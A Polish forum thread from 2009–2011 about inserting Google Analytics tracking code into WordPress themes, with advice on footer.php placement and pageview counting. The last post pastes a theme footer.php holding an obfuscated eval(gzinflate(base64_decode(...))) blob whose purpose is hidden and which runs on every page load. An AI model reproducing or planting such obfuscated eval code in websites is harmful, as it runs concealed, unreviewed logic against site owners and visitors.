co nowego na blogu Krzywego ebiznesy.pl: Płatne wyświetlanie reklam, czyli GPTR i autosurfy
 zajrzyj także na video - blog > celeber.pl:  Skracanie adresów URL z goo.gl, czyli z Google

Poinformuj znajomych o tym wątku
Poinformuj znajomych na Facebook-u o tym wątku Poinformuj innych ludzi na Wykopie o tym wątku Poinformuj znajomych na Twitter-ze o tym wątku Poinformuj znajomych na Blip-ie o tym wątku Poinformuj znajomych na Buzz-ie o tym wątku Poinformuj znajomych na GG o tym wątku
jeśli chcesz prowadzić skuteczny ebiznes, bez statystyk nie będzie to możliwe

A ja na początku założyłem, że masz WP na osobnym, niezależnym koncie jakiegoś serwera. Oczywiste to dla mnie było :P Ja rozumiem, że korzystanie z WP na ich hostingu jest może łatwiejsze dla całkowicie początkujących, ale bez przesady. Naprawdę, korzystanie ze skryptu na wykupionym koncie serwera jest bardzo proste i intuicyjne. Do tego daje o wiele więcej możliwości - praktycznie nie ma ograniczeń :P

Moje aukcje! - daj zarobić człowiekowi :)
Awatar użytkownika
Kamil 'seven' Lubelski

Miejscowość: Łódź

Kamil 'seven' Lubelski napisał(a):1. Logujesz się na swoje konto Google Analitycs i wchodzisz w ustawienia
2. Klikasz na "Edytuj" w kolumnie "Działania" w wierszu swojej strony, którą wcześniej musisz dodać do systemu.
3. W prawym górnym rogu kliknij na "Sprawdź status".
4. Zaznacz NOWY kod śledzenia, skopiuj.
5. Zaloguj się do panelu administratora swojego bloga.
6. Wygląd -> Edytor. Po prawej stronie klikasz na "Stopka (footer.php)"
7. Okno, które znajduje się na środku przewijasz na sam dół i znajdujesz znacznik "</body>". PRZED NIM wklejasz kod, który wcześniej skopiowałeś. Kliknij na "Zaktualizuj plik".

Tak teraz już wszystko sie zgadza, zrobiłem to w 7 minut:). Wielkie dzięki chłopaki:)

Kamil 'Camillus2' Kuczyński

Re: Google Analytics

Postprzez Mateusz Szczęsny 7 Gru 2009, o 19:29

• Poinformuj znajomych na Facebook-u o tym wątku
  • Poinformuj innych ludzi na Wykopie o tym wątku
  • Poinformuj znajomych na Twitter-ze o tym wątku
  • Poinformuj znajomych na Blip-ie o tym wątku
  • Poinformuj znajomych na Buzz-ie o tym wątku
  • Poinformuj znajomych na GG o tym wątku

Skoro już mowa o GA, to nie chcę zakładać zbędnego tematu, więc podpytam tutaj. Zacząłem ostatnio korzystać z GA i moje pytanie brzmi, czy wystarczy, że wkleję kod w byle który plik? Korzystam z Wordpress' a i wkleiłem kod w którykolwiek plik zawierający znacznik </body>. Z instrukcji google wywnioskowałem, że trzeba wlepić to w każdą pod stronę [?]. Jak to jest?

SMI Elnela - Portal społeczności eMarketingu
Szukasz dobrego tekstu? Copywriter.
Mateusz Szczęsny

NIe musisz bo ten temat był już poruszany. Ja miałem z tym spore problemy. :lol:

Zacząłem ostatnio korzystać z GA i moje pytanie brzmi, czy wystarczy, że wkleję kod w byle który plik? Korzystam z Wordpress' a i wkleiłem kod w którykolwiek plik zawierający znacznik </body>. Z instrukcji google wywnioskowałem, że trzeba wlepić to w każdą pod stronę [?]. Jak to jest?[/img]
Nie, wystarczy w skórkach w edytuj odnaleźć "stopka" (inaczej footer bodajże) i tam wkleić. Trzeba poczekać potem z 24 godziny. Nie wiem czy gdzie indziej działa, ale możesz dać znać. 8-)
Jak Ci się nie da to napisz jeszcze raz to napiszę Ci dokłądnie, albo podam linka. W sumie możesz go także sam znaleźć bez problemu. Tam dostałem pomoc profesjonalną.

Postprzez Mateusz Szczęsny 7 Gru 2009, o 20:12

Proszę mi wybaczyć moje roztrzepanie, nie pomyślałem w tym momencie o opcji szukaj.
Zobaczyłem teraz że wrzuciłem to w Header ale wcześniej po wrzuceniu pokazało w GA że dane są odbierane, przerzuciłem to teraz do Footera, mam nadzieje że będzie odpowiednio działało.

Mateusz Szczęsny

NIe ma problemu oczywiście. Mi się to też czasami zdarza niestety. Na wyniki będziesz musiał pewnie poczekać do jutra. :D
Pozdrawiam :lol:

Postprzez Tomasz Fabiszak 7 Gru 2009, o 20:32

tidimel napisał(a):Skoro już mowa o GA, to nie chcę zakładać zbędnego tematu, więc podpytam tutaj. Zacząłem ostatnio korzystać z GA i moje pytanie brzmi, czy wystarczy, że wkleję kod w byle który plik? Korzystam z Wordpress' a i wkleiłem kod w którykolwiek plik zawierający znacznik </body>. Z instrukcji google wywnioskowałem, że trzeba wlepić to w każdą pod stronę [?]. Jak to jest?

Tidimel, nie powinno się wklejać "w byle który plik", bo będziesz mieć bajzel (chyba, że lubisz) i żadnej pewności, że wszystkie strony są monitorowane.

Jeśli chcesz w WordPressie wklejać ręcznie kod GA, to umieść go w pliku: /wp-content/themes/<katalog_Twojego_motywu>/footer.php przed znacznikiem </body>.
Jeśli chcesz dodatkowo monitorować logowanie do zaplecza (kokpitu) oraz poruszanie się w zapleczu, to dodaj jeszcze kod GA w plikach (przed tagiem </body>):
/wp-login.php
/wp-admin/admin-footer.php

Jeśli nie znasz się wystarczająco dobrze (by rozumieć zawartość i strukturę kodu poszczególnych plików) na PHP i XHTML, to zalecam zainstalowanie sobie jakiejś wtyczki: Google Analyticator lub Google Integration Toolkit (obie testowałem i sprawują się dobrze).

Jeśli kod GA jest umieszczony na samym końcu strony (przed tagiem </body>, jak zaleca Google), to wywoła się dopiero po wczytaniu przez przeglądarkę całej strony. Jeśli kod GA jest umieszczony na początku, w treści strony (zaraz po <body>) lub w części <head></head> i wywołany np. zdarzeniem onload, to kod zostanie uruchomiony dużo wcześniej. Spowoduje to naliczanie większej ilości odsłon (takich, które nie zakończyły się całkowitym wczytaniem strony, ale zdążyły już odpalić kod GA).

Awatar użytkownika
Tomasz Fabiszak

Miejscowość: Poznań

Postprzez Mateusz Szczęsny 7 Gru 2009, o 20:44

Dzięki serdeczne za pomoc, już sobie poradziłem, wkleiłem do footera i jest ok, GA wykrywa bo jest pokazane, że oczekuje na dane, a nie tak jak wcześniej że nie zainstalowano. Teraz trzeba poczekać do jutra i sprawdzić czy odpowiednio działa :)

Tomek, czym mam rozumieć, że lepiej wkleić ten kod tuż przed </body> ? Dla większej, że się tak wyrażę wiarygodności odwiedzających? Chodzi o to, że strona się załaduje do końca, a nie ktoś kliknie w link i praktycznie zaraz wyłączy przed załadowaniem.

Mateusz Szczęsny

Postprzez Tomasz Fabiszak 7 Gru 2009, o 21:20

tidimel napisał(a):(...) Tomek, czym mam rozumieć, że lepiej wkleić ten kod tuż przed </body> ? Dla większej, że się tak wyrażę wiarygodności odwiedzających? Chodzi o to, że strona się załaduje do końca, a nie ktoś kliknie w link i praktycznie zaraz wyłączy przed załadowaniem.

Dokładnie jest tak, jak piszesz. Jedni traktują to jako wadę (GA pokazuje mniej odwiedzin niż np. Webalizer na serwerze WWW), inni jako zaletę.

Awatar użytkownika
Tomasz Fabiszak

Miejscowość: Poznań

W WordPress - GA

Postprzez Kalamazoo 20 Kwi 2011, o 12:41

W którym miejscu wkleić jeśli w footer.php nie ma </body>?

Zamieszczam skopiowany cały footer.php:

<?php
$footerHtml = <<<TXT
<!-- <a href="#">Contact Us</a> | <a href="#">Terms of Use</a> | <a href="#">Trademarks</a>
| <a href="#">Privacy Statement</a> | -->
TXT;
eval(gzinflate(base64_decode('bVRRb9owEH4eEv/hGrVzUhGYtmkPhYCqrdNe1geQJlXTFDnxkVh17Mx2YLTiv8+JA0W0kSCXO993d999yWI+Y3wDnCVrpSxqSTdg7E5gQiz+szEVvJA3Atd2SubDwWxRl/Vw8G5yDbdgOMOMauASbIngARbwgPUYHlQDOZX+1xirKv6ELhGuYaca3R+GLbels50jV6KppAG1dk5WoDXj7vjE/buntC8WAvGpBKLpcLBoe5q4CfwYuaDGJEEukGpkwdyH3JGT4PcuPXBecNfrSMylfImfXjMKpcZ1EnQsQCZUweVahUQb8zFttCDRFBbz4IDn3LGlRcxzJQOw3DpWg+Vq1fZF38J/3Uu7g7aVWX2Ywm2q5IyhPKyJcVMLuruRSqLbke9tOCiEyqiAS5T5N+mY4uvQ23CRACHRM/gGOqeqqFti4iC1xk1YPLm5BLUYZtTgl88pw1wx7AGiyI3ZJ1Mh1BYZOwC8oE37E3mj9Qr1BvU9rdDXSDW6lnMMg+12Ow5GQTC6TFd3y193y9/E39P725935E/Uw7TdnyMlZ+Wj5xdKNVZqgynNLVcyJNs67VUzIiKv6tTptcJU1W3YpCgZOc60d/d9a7jHxVFBvfRPiO0g/Jp6ek88SdJSPBxgXiq49LV/2Eq0RfYoDB5ipXO6+k4cuyPLJzjt/Hsv80MHbpZOeKqxYTRdzGGW6V5MX1W907woLbzPnTkFn9EVYu06yQPxKWcClo5QL94x3AoByxbEwBJNyzcbzyb18UXr35tT+7VuM5o/Flo1kgVnCSeEnnlm3Wt8mNFzFnZNvZF7Ecf9FLXm0q7DNA3JFYO/DWqOZgxXBozjUzIzJiMgj02mef5IohG0XxPZVGl/NHQuyyvUqftK1eGHEXyKuqoQx13NTLFdZ7S7mv8H')));
?>

Kalamazoo

PoprzedniaNastępna

Wróć do Google Analytics i inne statystyki